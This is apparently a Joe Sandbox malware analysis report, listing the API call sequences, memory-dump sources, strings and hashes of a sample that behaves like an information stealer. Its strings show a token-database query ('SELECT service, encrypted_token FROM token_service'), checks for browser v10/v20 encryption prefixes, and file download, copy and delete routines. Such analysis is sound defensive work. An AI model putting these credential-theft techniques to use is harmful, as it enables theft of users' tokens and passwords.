                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID: 0aA
                                            • API String ID: 167551676-2786531170
                                            • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                            • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                            • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                            • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02E296A0,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02E296A0,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                            • __aulldiv.LIBCMT ref: 00418172
                                            • __aulldiv.LIBCMT ref: 00418180
                                            • wsprintfA.USER32 ref: 004181AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                            • String ID: %d MB$@
                                            • API String ID: 2886426298-3474575989
                                            • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                            • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                            • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                            • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                            APIs
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A51
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A68
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A7F
                                              • Part of subcall function 03024A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03024AA0
                                              • Part of subcall function 03024A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 03024AB0
                                            • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 03026376
                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 030263AE
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 030263F6
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0302641A
                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 03026443
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 03026471
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 030264B0
                                            • InternetCloseHandle.WININET(?), ref: 030264BA
                                            • InternetCloseHandle.WININET(00000000), ref: 030264C7
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4287319946-0
                                            • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                            • Instruction ID: 6d9a178e59dfc1fa61c9b888203bbce7711ab0c32d865802d17ce69d002c0dc0
                                            • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                            • Instruction Fuzzy Hash: 525161B5A4131CABDB20DF90CC45BEE77B9EB45701F008098F645AB1C0DBB56A85CF95
                                            APIs
                                            • memset.MSVCRT ref: 03034FEE
                                              • Part of subcall function 03039047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 03039072
                                            • lstrcat.KERNEL32(?,00000000), ref: 03035017
                                            • lstrcat.KERNEL32(?,00421000), ref: 03035034
                                              • Part of subcall function 03034B77: wsprintfA.USER32 ref: 03034B93
                                              • Part of subcall function 03034B77: FindFirstFileA.KERNEL32(?,?), ref: 03034BAA
                                            • memset.MSVCRT ref: 0303507A
                                            • lstrcat.KERNEL32(?,00000000), ref: 030350A3
                                            • lstrcat.KERNEL32(?,00421020), ref: 030350C0
                                              • Part of subcall function 03034B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 03034BD8
                                              • Part of subcall function 03034B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 03034BEE
                                              • Part of subcall function 03034B77: FindNextFileA.KERNEL32(000000FF,?), ref: 03034DE4
                                              • Part of subcall function 03034B77: FindClose.KERNEL32(000000FF), ref: 03034DF9
                                            • memset.MSVCRT ref: 03035106
                                            • lstrcat.KERNEL32(?,00000000), ref: 0303512F
                                            • lstrcat.KERNEL32(?,00421038), ref: 0303514C
                                              • Part of subcall function 03034B77: wsprintfA.USER32 ref: 03034C17
                                              • Part of subcall function 03034B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 03034C2C
                                              • Part of subcall function 03034B77: wsprintfA.USER32 ref: 03034C49
                                              • Part of subcall function 03034B77: PathMatchSpecA.SHLWAPI(?,?), ref: 03034C85
                                              • Part of subcall function 03034B77: lstrcat.KERNEL32(?,0064A524), ref: 03034CB1
                                              • Part of subcall function 03034B77: lstrcat.KERNEL32(?,00420FF8), ref: 03034CC3
                                              • Part of subcall function 03034B77: lstrcat.KERNEL32(?,?), ref: 03034CD7
                                              • Part of subcall function 03034B77: lstrcat.KERNEL32(?,00420FFC), ref: 03034CE9
                                              • Part of subcall function 03034B77: lstrcat.KERNEL32(?,?), ref: 03034CFD
                                              • Part of subcall function 03034B77: CopyFileA.KERNEL32(?,?,00000001), ref: 03034D13
                                              • Part of subcall function 03034B77: DeleteFileA.KERNEL32(?), ref: 03034D98
                                            • memset.MSVCRT ref: 03035192
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID:
                                            • API String ID: 4017274736-0
                                            • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                            • Instruction ID: d1dc397bbd6c96eeef9b0ac8c12795b4000b01a82ff80dd720dc1b2a5fd86a5f
                                            • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                            • Instruction Fuzzy Hash: 0141957DB403146BDB14F7B0EC46FE9773CAFA5701F404494A685AA0C0EEB957C88B92
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 03038397
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0303839E
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 030383BF
                                            • __aulldiv.LIBCMT ref: 030383D9
                                            • __aulldiv.LIBCMT ref: 030383E7
                                            • wsprintfA.USER32 ref: 03038413
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                            • String ID: @
                                            • API String ID: 2774356765-2766056989
                                            • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                            • Instruction ID: 0bedf00fce509a8eb38643299541ec1acb089d2761d745bed921111fa8137f7d
                                            • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                            • Instruction Fuzzy Hash: AE214AB1E44218ABDB00DFD4CC49FAEB7BDFB45B04F108609F605BB680C778A9048BA5
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                            • API String ID: 1440504306-1079375795
                                            • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                            • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                            • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                            • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess$DefaultLangUser
                                            • String ID: B
                                            • API String ID: 1494266314-2248957098
                                            • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                            • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                            • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                            • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                            APIs
                                            • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                              • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                            • memset.MSVCRT ref: 00409EE8
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                            • API String ID: 1977917189-1096346117
                                            • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                            • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                            • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                            • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                            APIs
                                              • Part of subcall function 03027537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 030275A1
                                              • Part of subcall function 03027537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 03027618
                                              • Part of subcall function 03027537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 03027674
                                              • Part of subcall function 03027537: GetProcessHeap.KERNEL32(00000000,?), ref: 030276B9
                                              • Part of subcall function 03027537: HeapFree.KERNEL32(00000000), ref: 030276C0
                                            • lstrcat.KERNEL32(0064A668,004217FC), ref: 0302786D
                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 030278AF
                                            • lstrcat.KERNEL32(0064A668,00421800), ref: 030278C1
                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 030278F6
                                            • lstrcat.KERNEL32(0064A668,00421804), ref: 03027907
                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 0302793A
                                            • lstrcat.KERNEL32(0064A668,00421808), ref: 03027954
                                            • task.LIBCPMTD ref: 03027962
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                            • String ID:
                                            • API String ID: 2677904052-0
                                            • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                            • Instruction ID: 06364f3e13f1ab6ee67e5aee83a2ccefa4d1a9478d8292b2116e92b3d35126d5
                                            • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                            • Instruction Fuzzy Hash: B131407DA41219EFDB08FBE0DC94DFE7B7AFB85301B145118E106672A0DA34A946CB61
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                            • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                            • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                            • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                            • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                            • InternetCloseHandle.WININET(?), ref: 004050C6
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                            • String ID:
                                            • API String ID: 3894370878-0
                                            • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                            • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                            • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                            • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 03025231
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 03025238
                                            • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 03025251
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 03025278
                                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 030252A8
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 030252F1
                                            • InternetCloseHandle.WININET(?), ref: 03025320
                                            • InternetCloseHandle.WININET(?), ref: 0302532D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                            • String ID:
                                            • API String ID: 1008454911-0
                                            • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                            • Instruction ID: 1e03c6798fa23f3be466e56bdac5d092e29d1d414f9b4b28ef581b1ddef38101
                                            • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                            • Instruction Fuzzy Hash: 983119B8A40228ABDB20CF94DC84BDCBBB5EB49704F1085D9E609A7280D7706EC58F5D
                                            APIs
                                              • Part of subcall function 0303AA87: lstrlen.KERNEL32(0302516C,?,?,0302516C,00420DDE), ref: 0303AA92
                                              • Part of subcall function 0303AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0303AAEC
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 030358AB
                                            • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 03035908
                                            • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 03035ABE
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03035457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 0303548F
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 03035527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0303557F
                                              • Part of subcall function 03035527: lstrlen.KERNEL32(00000000), ref: 03035596
                                              • Part of subcall function 03035527: StrStrA.SHLWAPI(00000000,00000000), ref: 030355CB
                                              • Part of subcall function 03035527: lstrlen.KERNEL32(00000000), ref: 030355EA
                                              • Part of subcall function 03035527: strtok.MSVCRT(00000000,?), ref: 03035605
                                              • Part of subcall function 03035527: lstrlen.KERNEL32(00000000), ref: 03035615
                                            • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 030359F2
                                            • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 03035BA7
                                            • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 03035C73
                                            • Sleep.KERNEL32(0000EA60), ref: 03035C82
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID:
                                            • API String ID: 3630751533-0
                                            • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                            • Instruction ID: 4c0f6a848f57b4073587ce86abc1014277e319a1d7c514ae819ef1fd3ed39ee5
                                            • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                            • Instruction Fuzzy Hash: 2EE1737AA11748ABCB18FBB0DD91DFE737DAF97201F40856D94466A0A0EF345B08CB51
                                            APIs
                                            • memset.MSVCRT ref: 0302158E
                                              • Part of subcall function 03021507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0302151B
                                              • Part of subcall function 03021507: RtlAllocateHeap.NTDLL(00000000), ref: 03021522
                                              • Part of subcall function 03021507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0302153E
                                              • Part of subcall function 03021507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0302155C
                                              • Part of subcall function 03021507: RegCloseKey.ADVAPI32(?), ref: 03021566
                                            • lstrcat.KERNEL32(?,00000000), ref: 030215B6
                                            • lstrlen.KERNEL32(?), ref: 030215C3
                                            • lstrcat.KERNEL32(?,004262EC), ref: 030215DE
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 03038DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,03021660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 03038DED
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 030216CC
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03029C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 03029C53
                                              • Part of subcall function 03029C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 03029C78
                                              • Part of subcall function 03029C27: LocalAlloc.KERNEL32(00000040,?), ref: 03029C98
                                              • Part of subcall function 03029C27: ReadFile.KERNEL32(000000FF,?,00000000,030216F6,00000000), ref: 03029CC1
                                              • Part of subcall function 03029C27: LocalFree.KERNEL32(030216F6), ref: 03029CF7
                                              • Part of subcall function 03029C27: CloseHandle.KERNEL32(000000FF), ref: 03029D01
                                            • DeleteFileA.KERNEL32(00000000), ref: 03021756
                                            • memset.MSVCRT ref: 0302177D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID:
                                            • API String ID: 3885987321-0
                                            • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                            • Instruction ID: cafd359adc4723b98f6fcd83315edc70c9a323c7af94b6557ac5c1896956b68c
                                            • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                            • Instruction Fuzzy Hash: 7A5184BAE513189BCB19FB60DD90EED737CAF96200F4041E8A64A66090EF305B89CF55
                                            APIs
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                            • wsprintfA.USER32 ref: 00418459
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • RegQueryValueExA.ADVAPI32(00000000,02E295F8,00000000,000F003F,?,00000400), ref: 004184EC
                                            • lstrlenA.KERNEL32(?), ref: 00418501
                                            • RegQueryValueExA.ADVAPI32(00000000,02E29628,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                            Strings
                                            Memory Dump Source
